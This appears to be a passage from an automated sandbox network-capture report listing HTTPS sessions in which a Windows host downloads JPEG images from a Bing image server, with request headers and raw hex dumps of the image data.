89 a6 16 d1 bf dc a9 36 de 5e 5e ef 96 8b a8 9d 64 d8 ff 00 72 9a 66 aa 6b 45 2d cc f4 8b fb f5 1b f5 ab fb 1d bf ed a5 53 11 93 26 d1 41 bc 67 70 f3 64 f2 3c Data Ascii: /mVvOVguk[/yyQb?V>nSK,#?wVIiC7Vq^ItDKT<]s?g:%-ghJMT]/KdyUW8m~@w?Ju}Th2o5j[6^^drfkE-S&Agpd<
2024-11-25 23:25:54 UTC	8192	IN	Data Raw: 4e 0e 3b 58 bf 71 3b cd 1c 7f dc a8 af 99 1b e4 4a 74 73 ee 8f c9 4a 81 0f 95 27 cf 4a 31 d4 50 56 e8 22 2f f7 ea 37 eb 57 2e 27 46 8f e4 aa 7c d5 9a c5 b6 b5 41 cd 1c d1 cd 39 22 2d 41 57 48 6f 35 7f 45 72 b7 71 c2 b2 f9 5e 63 ec 79 3d aa 93 2e 29 f6 7b 16 6d d2 8f 92 aa 2d a6 4c 92 94 5a 35 35 29 6d d6 6d 9f eb 3f 79 4c 92 29 1b e7 4f b9 1d 52 8d 7e d3 77 b5 3f e0 15 62 7b e9 12 5d 95 52 9b 68 e6 f6 6e 36 8c 59 15 e3 79 b1 ef a9 bc e8 a2 b5 8d 5a 52 71 ff 00 2c f1 50 ce cf 6f 36 fa 8e 6f 25 ad b7 7f cb 4a 98 b6 8d 23 15 24 bb 0c 61 bf cc 9b 1f 26 6a ce ad 75 0d c3 46 b6 b1 18 e2 8f a6 fa a6 d2 bb 47 b2 a5 b1 67 49 77 8a 69 f4 45 c9 7d a7 d0 89 b7 bd 35 95 97 ef 0a 96 56 a9 76 bd c7 c9 fc 11 d0 d5 95 c7 cd a5 ca a8 bb aa 5f 2c e7 39 f9 2a 5f 2b 6c 7b 13 Data Ascii: N;Xq;JtsJ'J1PV"/7W.'F\|A9"-AWHo5Erq^cy=.){m-LZ55)mm?yL)OR~w?b{]Rhn6YyZRq,Po6o%J#$a&juFGgIwiE}5Vv_,9*_+l{
2024-11-25 23:25:55 UTC	8192	IN	Data Raw: 11 fd a6 b5 af 0b ea fe 36 b6 d1 3c 10 b3 5b e8 3a 45 9a 41 14 72 f7 9f fe 5a bd 79 93 44 eb 2e c8 a9 f3 5c a8 92 4f dd 7c cf fa 52 58 c9 b2 4d f5 fa 1d 18 fb 3a 6a 2b 63 d0 a7 07 4e 0a 2b a0 db 88 a6 5f 2f 77 fc b4 a9 63 95 fc a9 11 3e e5 6f 78 66 da de e2 fe 37 bd 9b f7 72 7e ef cb 8f ef d2 78 ff 00 4c 8e da e6 de 7b 38 7c bb 3b 98 ff 00 d1 d3 cd f9 fe 5f 97 73 d2 f6 c9 cf 91 10 ab 29 49 45 99 37 10 6d 8f 7f 95 54 f5 44 91 65 de ff 00 c7 57 e6 9e e2 e3 cb 44 8a 9b fd 8d 79 3c b2 79 3f bc f2 c6 fa d1 49 af 88 74 e4 a0 d7 3b 46 42 75 ab ff 00 6c 83 ca ff 00 55 f3 d3 ee b4 89 2d ed 7e d1 24 b1 ed aa f2 08 5e 3f dc c4 7e 4e b5 69 a6 b4 36 e6 85 45 75 aa 23 9f 7b 49 fe af f0 a8 79 ab 5e 7a 34 7f 35 55 e6 99 70 bd b6 0e 68 e6 8e 68 e6 82 c3 9a 39 a7 6d 34 60 Data Ascii: 6<[:EArZyD.\O\|RXM:j+cN+_/wc>oxf7r~xL{8\|;_s)IE7mTDeWDy<y?It;FBulU-~$^?~Ni6Eu#{Iy^z45Uphh9m4`
2024-11-25 23:25:55 UTC	8192	IN	Data Raw: 28 e7 f0 a4 d0 db da 6a 36 df 6b b6 8e 39 77 f9 7e 7a 7d c6 fa 55 ef 8c 97 93 b6 ad 22 69 f6 77 71 3d bc 7b 2e 74 e9 65 ff 00 57 ff 00 4d 1b fe 01 5e a9 ae 78 7f e1 d7 85 fc 31 65 e2 bf 1a de 69 f2 6a 36 7a 07 97 1e 93 24 be 76 cb 86 4f dd b3 2d 28 e2 1b e5 f6 d1 e6 8c f4 b1 d1 46 8b 86 a8 f9 5b e2 67 8c 75 bf 16 cd 6c 7c 41 a8 cd 70 62 8d 12 28 e4 fb 91 af fb 35 14 da 26 99 a8 59 d9 c1 a2 fd aa 4d 52 49 1f cc 8f 1f ba 48 95 3e f5 33 52 9e 16 d0 f7 c3 a6 c5 fe b7 fe 3f 6b 1e d2 fa ea de da 4f 36 59 77 c9 16 c8 f6 1f e1 6a fa ac 3d 15 0a 49 52 5c a9 74 5b 1b de 52 57 45 2d 60 c2 97 3b 52 53 22 7f 1d 6b fc 2d 8a 7b 8f 15 88 6d 61 37 13 49 13 c7 6d 1e 37 7c ed f2 af cb 58 fa c9 b1 30 db ad 94 32 c6 63 8f f7 ef 27 f1 bd 6f 7c 19 f1 c6 a5 f0 f7 c6 b1 78 8b 4b Data Ascii: (j6k9w~z}U"iwq={.teWM^x1eij6z$vO-(F[gul\|Apb(5&YMRIH>3R?kO6Ywj=IR\t[RWE-`;RS"k-{ma7Im7\|X02c'o\|xK
2024-11-25 23:25:55 UTC	8192	IN	Data Raw: 5a d9 c3 24 16 5f bc fd d4 bf fa 0d 74 7e 03 ff 00 84 7a 2f 06 fd ab c5 73 5a 5c 5f 7c ff 00 69 b6 8f fe 59 a7 f0 d6 47 c5 af 1b 78 7b c1 9e 26 f3 ec bc 98 e0 fe cd f3 2d a5 b6 95 3c 99 3f b9 1b ff 00 b5 5f 8c d1 a3 5d 4f 96 ce e9 9f 69 37 04 93 28 78 57 c3 97 76 fa 77 9f 6b a9 7d 8a 38 ff 00 79 fb df dc f9 6e c9 fc 55 46 fb c2 ba d3 f8 4f 52 d5 ee bc 55 fd a3 75 e5 bd be 9b 65 2c bb 3f 7b fe cd 73 de 38 d7 b5 2b 7f 16 49 06 bd a9 79 6f 7b 65 6d 7f 65 24 5f 3a 49 e6 ff 00 0c 95 06 a3 e1 ed 5b 53 fb 35 ef 84 2f 21 b7 f3 2f 7c bf 32 59 77 a5 bb af df 68 eb d4 58 6c 43 9a 72 92 b3 ee bf 53 8e ae 2a 34 95 ec 60 c9 e2 5d 33 c2 f0 c8 8f e1 b9 af 6e a4 b2 7b 4d 4a e7 52 bb df f3 ff 00 d3 1a c6 f1 a6 ab 1e b7 f0 f6 2b af 01 eb da b5 be a5 6f 6d 6d 69 ab 59 5c ff Data Ascii: Z$_t~z/sZ\_\|iYGx{&-<?_]Oi7(xWvwk}8ynUFORUue,?{s8+Iyo{eme$_:I[S5/!/\|2YwhXlCrS*4`]3n{MJR+ommiY\
2024-11-25 23:25:55 UTC	8192	IN	Data Raw: 76 7e 15 d2 2d 2d 35 0b 69 f5 bf f5 1f f2 d6 3f e3 ae cb 5c d0 f5 6d 33 cc d5 3c 37 fd ad a7 69 bf f5 d6 ba 6f 07 7c 18 f1 0e ab a8 47 a8 eb 10 c3 1f ef 3c b8 e3 97 fe 5a 7f be d5 d7 d8 d8 c7 a7 ea d7 3a 26 b7 a6 cd 71 1e 9d 27 97 fb af 9e bc 4c 46 32 82 9f 2d d3 36 52 9c 3d e8 9c 97 87 3e 2c ea d1 69 36 da 76 a1 79 35 e4 96 f1 f9 71 c9 2d 71 b6 36 da ef c4 2f 1c 44 97 53 4b 1c 92 6f f3 3f e9 9c 4b f3 35 7d 31 e0 ed 07 c3 d7 70 c7 aa 5a d9 da 5c 5f 49 73 e5 c7 1c b1 7f 07 f7 ea c5 ae 95 a1 78 67 50 92 f7 4e b3 b4 fb 75 c7 fc b4 fe 3a f2 3e b9 84 a5 29 7b 38 7b d6 ec 6c ab 57 a9 a4 cf 9d 75 2f 86 fa 2e 95 35 cc f3 79 d2 58 de db 7f a1 49 24 5b 3c b7 ff 00 6a bd 43 e0 7f 81 fc 27 e0 a9 bf e2 77 ac 5a 6a 37 5f f1 f1 65 fb df dc f9 ac 9f 35 74 de 22 b9 d3 75 Data Ascii: v~--5i?\m3<7io\|G<Z:&q'LF2-6R=>,i6vy5q-q6/DSKo?K5}1pZ\_IsxgPNu:>){8{lWu/.5yXI$[<jC'wZj7_e5t"u
2024-11-25 23:25:55 UTC	8192	IN	Data Raw: 5b 4a b4 b6 fb 2d 9c d2 41 7b 1f 99 1c 91 44 e9 fb af e1 d8 d5 46 4d 16 ef 53 b4 b6 74 87 ed ba 54 9e 74 92 79 5f df d9 fc 4d 5e 85 0c 37 b3 57 9e b1 45 4a 4a 51 f7 0e 4b e1 7f 81 64 f1 5d ad b3 f8 92 69 ad e7 93 f7 f1 7f d3 4d bf 79 2b d0 f5 5d 0f ed 76 91 dd 4f 79 34 96 ba 74 7f ba 8e 28 91 3f ef bf a5 71 b3 f8 da d3 4a d4 2d 9f fe 62 5e 67 fd b1 d9 b3 6d 6a 68 fe 35 9f 4f b5 fb 54 1f e9 11 c9 1f fa 6c 72 ff 00 cb 47 93 fb bf ec d7 44 95 46 ef 05 a7 44 67 ca ba 9b 3f db 57 f6 56 72 58 f9 d6 92 5a c9 27 97 e6 45 12 79 d5 ec 3e 15 fe c9 4d 26 37 d2 21 86 38 fc bf f5 92 fd fa f9 c7 c3 fe 3c f0 de 95 ab 7e ff 00 ca 8f ec ff 00 f4 c9 df e6 5f ba b5 e8 3a 57 8f 63 b8 87 fb 53 f7 36 fa 6c 92 24 72 47 f7 3f e0 4b 5c b8 88 d6 92 e5 5b 1c be c6 ce e7 a6 eb 13 c7 Data Ascii: [J-A{DFMStTty_M^7WEJJQKd]iMy+]vOy4t(?qJ-b^gmjh5OTlrGDFDg?WVrXZ'Ey>M&7!8<~_:WcS6l$rG?K\[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.6	49924	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:54 UTC	375	OUT	GET /th?id=OADD2.10239370639330_1D80T5H13WVAODNQ8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-25 23:25:54 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 835660 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: A7842FDB159E4CD0912AE54A12DF0E5A Ref B: EWR30EDGE0911 Ref C: 2024-11-25T23:25:54Z Date: Mon, 25 Nov 2024 23:25:53 GMT Connection: close
2024-11-25 23:25:54 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1c 64 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 31 3a 32 31 20 31 36 3a 32 33 3a 34 30 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``dExifMM*bj(1r2i``Adobe Photoshop 25.1 (Windows)2023:11:21 16:23:408
2024-11-25 23:25:55 UTC	16384	IN	Data Raw: fd f2 c9 27 cd ff 00 2c 69 d1 c7 3f 97 b9 53 e5 6f e3 aa 52 95 f7 38 6b 6a b5 64 72 47 e5 41 e5 af fa b6 fe 0a a2 b0 2a 49 be 34 dd b6 ad dd 45 2b c8 9f bc 8d da ab 63 3b be 7d ad 5b 43 53 86 a4 ba 14 e6 6d af ba 3f bd 51 b1 95 a4 ab d3 27 97 fd da af 70 aa 7e 65 ad 14 50 e1 3b 91 ac bf dd 4a 31 24 8f fe f5 3d 91 47 dd 7f 9a a5 b7 45 f3 37 48 ff 00 2d 1a 0d c9 21 ab 6c d6 bf bd 3f 35 41 71 27 99 f7 aa cd d6 d2 fb 43 ff 00 c0 aa ab 06 67 da b5 36 08 5d ea f7 22 64 6a 23 4c 7d ea b3 e5 7c 9c 54 a6 2d bf 7a 8d 8a 75 0a 6a 1b 75 5c b7 2c 29 70 b5 23 47 f2 ee a6 8c a5 52 e5 ab 39 3c df f7 aa d4 47 1f 76 b3 6d 65 f2 fe 5a d0 b7 7d d4 8e 2a b1 b3 f2 2d c6 8c d4 93 44 bf c5 4f 8d d7 7e d5 ff 00 81 54 db 73 d6 8d ce 27 26 99 4d 76 fd c5 4a 9e 35 53 f2 d0 d1 fc f4 Data Ascii: ',i?SoR8kjdrGAI4E+c;}[CSm?Q'p~eP;J1$=GE7H-!l?5Aq'Cg6]"dj#L}\|T-zuju\,)p#GR9<GvmeZ}-DO~Ts'&MvJ5S
2024-11-25 23:25:55 UTC	16384	IN	Data Raw: c1 24 5f f3 f7 e4 c8 bf 6c 7f b9 9f 9f 9f 94 ee ae 4b c3 be 24 b1 d7 b5 5d 26 f2 4d 76 ea de 4f 9b ed 71 43 b5 9b 9d fb b6 f0 31 9f ba 77 67 e5 ad 3f b4 58 ea 3e 2a 5d 37 4b d7 92 5d 3f ec fe 57 92 ef 27 9f 32 ed d8 51 8a af de 46 e4 0f 4a d6 38 49 54 4e 37 e5 fc cf 62 9c e5 5a 16 93 1b aa 58 68 be 64 d6 77 9e 1e 82 5b 88 bf 7f 6f 35 a4 0b 3c f6 79 fb b1 e1 ff 00 8b ee f4 5c d7 25 e3 2f 08 bc 1a 83 6a ba c6 85 ac 45 75 3b ac 76 2f 7d 1b 5a ad 9a 8f bb e5 27 43 fe 73 5e 91 63 f6 6f 07 f8 ab fb 63 c2 ff 00 f0 91 c5 34 56 fb 5d f5 68 3c fb 37 90 af cb f3 a1 dc 9e d5 e7 9f 1a a4 f1 7c 57 56 fa 96 a1 ab 5d 4f ab 5e 6e 93 ec f7 73 ac ed 6a bf ec 7c d8 da 47 d2 bb 30 35 31 34 2b a8 c6 dc bd db 6f ee 5f ad ce 2a 98 58 c6 77 b1 e7 fe 28 f1 4d 9f 87 ee ae ed f4 fb Data Ascii: $_lK$]&MvOqC1wg?X>]7K]?W'2QFJ8ITN7bZXhdw[o5<y\%/jEu;v/}Z'Cs^coc4V]h<7\|WV]O^nsj\|G0514+o_Xw(M
2024-11-25 23:25:55 UTC	16384	IN	Data Raw: c2 c5 1b 7b 7f a4 5c 3b 45 3b e5 bf da c8 e0 7f 74 54 77 5e 21 d7 2f ee ad e1 f0 ae 9b 1b 69 ff 00 6b 68 a5 86 ee e9 a5 fb 4a 86 f9 9e 2f 37 3b 91 4f f7 5b 23 d2 b6 ef b5 4f 0e 6a f6 3f 65 ff 00 89 ad be b5 14 cd 14 df 67 4f dd 4d 1f f7 70 f8 08 cb b7 b1 ae 9a b8 74 af 28 68 df 5e a6 d0 ad 39 db 99 68 50 9b c5 12 e8 9a 6a 5c 6a 17 fe 6c 76 bf 2a 5c 79 7f 71 8b 7d ef f6 c5 69 37 8a e3 d2 3c 54 8d a7 c1 23 42 d0 aa dc 5b c3 f3 2b b7 97 f3 4b bb 77 7d db f3 f4 ac df 1a 41 e1 cd 7b c3 30 d9 e9 be 65 d3 7d ad 7e dc f3 3b 79 bb 47 f0 c6 bf 77 6f cb cb 2f f0 d6 3c 97 1a 36 93 a9 4d 75 fd a5 6b fd 9b 15 a4 3b 2f ac 77 4f b3 7a f0 a3 23 e4 db b3 9a e4 a7 84 52 a7 7b 6a cc ea 62 39 aa 28 5f 44 77 eb e2 bb 3d 2f ed 7a b4 97 f2 34 cb 6f e5 42 9b 15 9b ea 71 c3 57 1f Data Ascii: {\;E;tTw^!/ikhJ/7;O[#Oj?egOMpt(h^9hPj\jlv*\yq}i7<T#B[+Kw}A{0e}~;yGwo/<6Muk;/wOz#R{jb9(_Dw=/z4oBqW
2024-11-25 23:25:55 UTC	16384	IN	Data Raw: d4 f1 e4 f0 4f e3 14 d6 9a c6 d6 fe 15 99 96 6b 4d 8b b5 23 0b 80 0d 75 37 5a 47 82 6f 2e ad ef 26 82 35 fb 46 d5 89 13 e5 fd e1 ff 00 57 f2 8f bb 5c 4a bf b2 84 6a 49 b6 e4 bf a4 6d 28 ab b5 d1 1c 4a cf 73 6b 3f 9d 67 e6 5b c7 2a 2e c7 77 dc af f2 8f 97 d0 f5 e4 76 ad 7d 3f 50 b3 b7 d3 7e c2 b1 c0 cd 2b af da 13 63 79 5b 7a fc f5 9f e3 23 2e 9b a9 5c 47 e4 79 b0 da bc 8b 0f cf e6 f9 39 c2 02 bd b7 66 ad 78 46 ca f2 d6 7b 18 f5 0b 4b ab 8d 16 f2 66 89 37 ce b7 52 c2 c5 b6 3f cb c3 2f ad 6b 2c 3c 2b 43 9d 7a 82 aa e0 56 f1 06 8f e1 36 d0 ef af 23 d2 64 ba 6d eb 3d c2 23 b6 de 57 1b be 6f e1 03 ff 00 1e ac 8d 1f c1 fa 44 f3 ea 0b a6 ea 5f 60 fb 3d db 4f 35 c3 dd 47 6b 14 2a 57 6a 05 77 fb df f0 1e b5 df dc 78 93 4f b3 d5 6e e3 59 2c 62 b8 b7 45 8a 1f b4 47 Data Ascii: OkM#u7ZGo.&5FW\JjIm(Jsk?g[.wv}?P~+cy[z#.\Gy9fxF{Kf7R?/k,<+CzV6#dm=#WoD_`=O5GkWjwxOnY,bEG
2024-11-25 23:25:55 UTC	16384	IN	Data Raw: 75 1f 85 6e e5 15 4a 4a 4b 6f d0 d3 0f 5e a3 9b 8d f4 46 fd 8e 9f a3 5b dd 5c 79 9a 2f db fe 75 59 b6 22 ed 75 ec bf 7b 3f 85 4b 75 06 95 0d f5 c6 a1 71 77 6b a3 5a c5 fe 9d 71 6c 9b 9b ed 32 0e df 37 1c 74 0b eb 51 e8 fa ce a5 06 a9 fd 93 a4 f8 7b 43 d4 7e cf e6 45 6f 7d e7 b2 cf 37 4c 3c 9f c2 d8 eb da b2 35 8f 0f f8 f1 75 cd b7 5a 6e 9d 71 35 e7 ef f6 3c eb 2a a3 6e f9 47 5c 27 0d f8 d7 24 a2 e4 ec de e7 75 4a f4 55 ae 53 9b e2 2d a6 ad e2 3b b9 21 9e fa 2f 36 25 68 5f e5 5f 25 51 be 7f 97 ee b7 bd 77 3e 1b 95 6f 77 dc 2e a5 26 a8 ab 71 fb eb 7b 89 fe 59 94 2e ef 2f d7 7f 6e 78 f9 78 35 e1 ea d7 9f f0 94 26 9b 71 63 e4 2c 57 2a b7 d2 bd 92 fc f3 19 33 b3 76 7e 4c 7c d8 ad ff 00 0e c5 ae 5c f8 c2 d3 4f d0 63 d5 6f d5 62 f9 e5 74 f2 9b ef 79 92 21 d9 90 Data Ascii: unJJKo^F[\y/uY"u{?KuqwkZql27tQ{C~Eo}7L<5uZnq5<nG\'$uJUS-;!/6%h__%Qw>ow.&q{Y./nxx5&qc,W3v~L\|\Ocobty!
2024-11-25 23:25:55 UTC	16384	IN	Data Raw: a2 df dd 69 b1 dc 43 b6 de 17 83 cd df 1c 6c 33 b7 76 07 bf f7 ab bd 61 60 e0 9b 96 9e a2 72 b7 bd 73 27 c4 c7 c4 be 28 92 6d 3f 47 d3 75 2f b5 7f aa 87 c9 db 13 24 83 38 f3 a4 cf c9 bc 71 b1 7f 13 5d 57 8c 3c 35 63 75 e0 38 61 bc 83 fe 26 9a 4b ab 5d df 4d 74 b1 6f 8c 28 f3 36 aa f4 cb f4 f5 15 c8 f8 cb 5b d7 2e a7 d2 61 87 56 8e ea f1 51 65 b8 b7 44 dd fb ce 4f fa b1 f7 f0 bb 78 cd 5a f0 df 8d f5 3b 3b 19 ac fc 69 e7 dd 5a dc 5c 2f fa 3d ba 2c 4b b7 b7 98 c9 bb 72 83 db b5 75 d1 aa a1 4e 2e 0b 4f c4 c6 53 4f 5d cd 3d 43 e1 dd e6 93 a5 4d 6a b1 dd 6a 56 7b 37 25 be 97 02 ed 4d 8d f3 33 ab b0 27 7a e7 eb 5c 5a f8 56 c7 54 9d 1a 1f 0d d8 b2 ad c2 db 5a 5b ea 36 ac cd 34 85 77 fe e9 15 48 5c 77 cd 7a 0d c6 bf 16 a5 75 a8 47 ae 78 b2 3b 8b 86 b7 56 4b 8f 23 Data Ascii: iCl3va`rs'(m?Gu/$8q]W<5cu8a&K]Mto(6[.aVQeDOxZ;;iZ\/=,KruN.OSO]=CMjjV{7%M3'z\ZVTZ[64wH\wzuGx;VK#
2024-11-25 23:25:55 UTC	16065	IN	Data Raw: ff 00 ba ed df 8a ca 78 9a 69 39 4a 1a 1b 73 54 b6 fa 94 3e 0f e8 6b 71 6f 71 33 7d bb ed 92 ee 89 21 87 e5 57 52 a3 a9 35 93 e2 4d 03 c6 ba 5d ad c6 a9 67 a1 7d 82 16 9b 6d 8d bf 96 db b7 37 a7 f7 7d 79 af 78 f0 ed 9a b4 1b ad 60 8f 6b 7c a9 b1 36 b2 29 ff 00 0a a7 e2 ef 0f 6a 16 1e 19 be bc 8e ff 00 ed 97 0d b7 c9 b4 d8 cd bd 8f 19 5e 6b e6 aa e3 63 ed b6 56 7d 19 eb 61 79 9c 52 b9 e2 bf d9 ba 7d e7 82 d2 f2 f2 7f ec bd 72 7b 85 8e f9 2d d3 6b 23 15 db 9d a7 85 5f 5c 57 61 f1 f3 4d f1 77 89 ec b4 cd 07 58 d3 1f 56 ba 5b 48 56 de 5d 26 c6 35 96 e6 3d bf 24 8f c0 f9 b7 71 fe ed 75 d6 7a 3c be 14 f0 ed c7 99 a4 c1 aa 78 c2 2d d3 d8 ff 00 67 5a ac fb 30 b8 f9 8b ff 00 10 af 2b d7 3c 43 f1 47 c1 fa f2 7d aa 0b a5 fe d6 89 99 fe 4d d1 ed 3d 9f 67 a7 a7 6a e5 Data Ascii: xi9JsT>kqoq3}!WR5M]g}m7}yx`k\|6)j^kcV}ayR}r{-k#_\WaMwXV[HV]&5=$quz<x-gZ0+<CG}M=gj
2024-11-25 23:25:55 UTC	16384	IN	Data Raw: 61 a8 79 d7 56 49 77 19 42 85 5f f8 73 fc 43 dc 76 ab 1a 06 93 71 af 6a ed 1d b2 3a 42 9f 34 d2 ec dc b6 f1 ff 00 79 ea 55 a1 e8 67 a5 3b ff 00 2a 31 6a c5 cf 98 15 63 7d d9 5f e1 35 b9 e1 d7 f0 fd 8f c4 0b 57 d4 a0 92 fb 47 82 e3 f7 a9 17 de 99 05 47 f1 22 7d 3e e3 c6 17 b2 69 71 c8 96 ad 2e 51 1f ef 2f b5 1c fe fa 56 05 52 f5 14 6d a5 ae 57 d6 b5 75 be d1 b4 db 15 b2 8a 1f ec f8 99 4c ab f7 a5 cb 67 2d 59 4a 71 c8 eb 4c a2 aa 31 51 56 46 91 8a 8a b2 3a ed 3f 50 f0 e6 ab e3 1b 5b 8f 11 25 cd a6 99 1d be d9 cd a2 2b 48 ee b1 f6 cf 1f 33 55 8d 57 4c f0 d5 cf 80 e0 d5 ac ae 05 8d e2 ca e8 6d e6 66 66 b8 c6 09 e9 d3 15 c4 d2 ee f9 76 d6 72 a3 76 9c 64 d5 8c 7e ae 93 8f 2b 6a c2 51 45 15 b1 d0 14 51 45 00 14 51 45 00 14 51 45 00 7d a5 0e b1 7d 2c 96 8b a3 da Data Ascii: ayVIwB_sCvqj:B4yUg;*1jc}_5WGG"}>iq.Q/VRmWuLg-YJqL1QVF:?P[%+H3UWLmffvrvd~+jQEQEQEQE}},
2024-11-25 23:25:55 UTC	16384	IN	Data Raw: ad 78 da da 38 2d 74 fb e5 92 37 bc b0 48 65 bb d3 ae 1d be 48 dd 43 a6 f4 fe e8 e8 71 fd ea e6 f5 2f 07 7c 44 bf f1 e3 f8 7f 4f d2 6c 5a fa ea 15 96 d2 e1 35 18 d5 66 8c ae ed f1 3b 60 3f cb f8 8a ed c3 50 95 79 73 de fd ce 65 89 8a 86 81 e0 ff 00 18 68 76 52 6b 9a a6 ad 69 e6 dc 45 69 0b 58 bc a8 cd 02 4d e6 61 c4 a7 f8 17 69 aa de 07 d5 2f 35 08 f5 9b 3d 35 e0 d6 ed ed ed fc a9 a1 49 fc af 94 f0 9c f3 f2 8f bf df 9a d3 f0 bd b6 a1 a7 68 f7 6b a8 47 22 ea 57 1f 7d de 0d cb 33 23 6d 41 d3 6c 8a ff 00 3a 1f f6 aa cf c3 5b dd 2b fb 37 c4 9e 1d 87 4d 8f 4b b8 f1 1e 9c ca f7 c9 6a ab f6 28 d1 86 f9 3b 73 e9 fe e5 7b 54 69 51 49 d3 6b fe 1c e7 a9 29 3d 4f 37 d7 be 14 f8 ba 5b d8 b5 1d 4a f6 d2 0b 79 62 55 0e ee bb 6e 58 c9 f2 aa 22 f5 5e 7a f1 51 f8 ae 35 d2 Data Ascii: x8-t7HeHCq/\|DOlZ5f;`?PysehvRkiEiXMai/5=5IhkG"W}3#mAl:[+7MKj(;s{TiQIk)=O7[JybUnX"^zQ5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.6	49927	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:54 UTC	346	OUT	GET /th?id=OADD2.10239381741590_17WQZAEC34EOK6NSA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-25 23:25:55 UTC	856	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 904903 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: AC7C753EF14D4868986567E987C10FDF Ref B: EWR311000107017 Ref C: 2024-11-25T23:25:54Z Date: Mon, 25 Nov 2024 23:25:54 GMT Connection: close
2024-11-25 23:25:55 UTC	15528	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 21 08 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 32 3a 32 39 20 30 39 3a 32 39 3a 31 34 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``!ExifMM*bj(1r2i``Adobe Photoshop 25.2 (Windows)2023:12:29 09:29:148
